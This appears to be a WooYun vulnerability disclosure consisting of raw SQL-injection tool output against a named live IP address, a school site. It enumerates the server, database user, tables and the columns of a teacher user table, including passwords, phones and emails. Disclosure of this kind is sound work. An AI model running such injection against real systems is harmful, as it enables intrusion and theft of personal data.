WooYun.org

Analyzing http://202.204.213.10/gerenzhuye.php?user_id=140
Host IP: 202.204.213.10
Web Server: Microsoft-IIS/6.0
Powered-by: PHP/5.2.5
Keyword Found: 1088888888
Injection type is Integer
Selected Column Count is 5
Valid String Column is 1
DB Server: MySQL
Current DB: teacher
Current User: wulixi@localhost
Sql Version: 5.0.45-community-nt
Current DB: teacher
System User: wulixi@localhost
Host Name: svctag-hp6c13x
Installation dir: d:\host\MySQL545
Db user: 'wulixi'@'localhost'
Data Base Found: information_schema
Data Base Found: teacher
Data Base Found: information_schema
Data Base Found: teacher
Count(table_name) of information_schema.tables where table_schema=0x74656163686572 is 14
Tables found: daohang,huida,jxhd,kyxm,largecategory,lb_content,news,shgz,shjl,smallcategory,user,wendafenlei,wenti,zylz
Count(table_name) of information_schema.tables where table_schema=0x696E666F726D6174696F6E5F736368656D61 is 17
Tables found: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS
Count(column_name) of information_schema.columns where table_schema=0x74656163686572 and table_name=0x75736572 is 19
Columns found: id,jsbh,name,biming,password,touxiang,zhicheng,xuewei,biyeyuanxiao,bumen,zhiwu,yanjiufangxiang,bangongshi,phone,email,pindao,lanmu,quanxian,zhuangtai
Count(*) of teacher.user is 114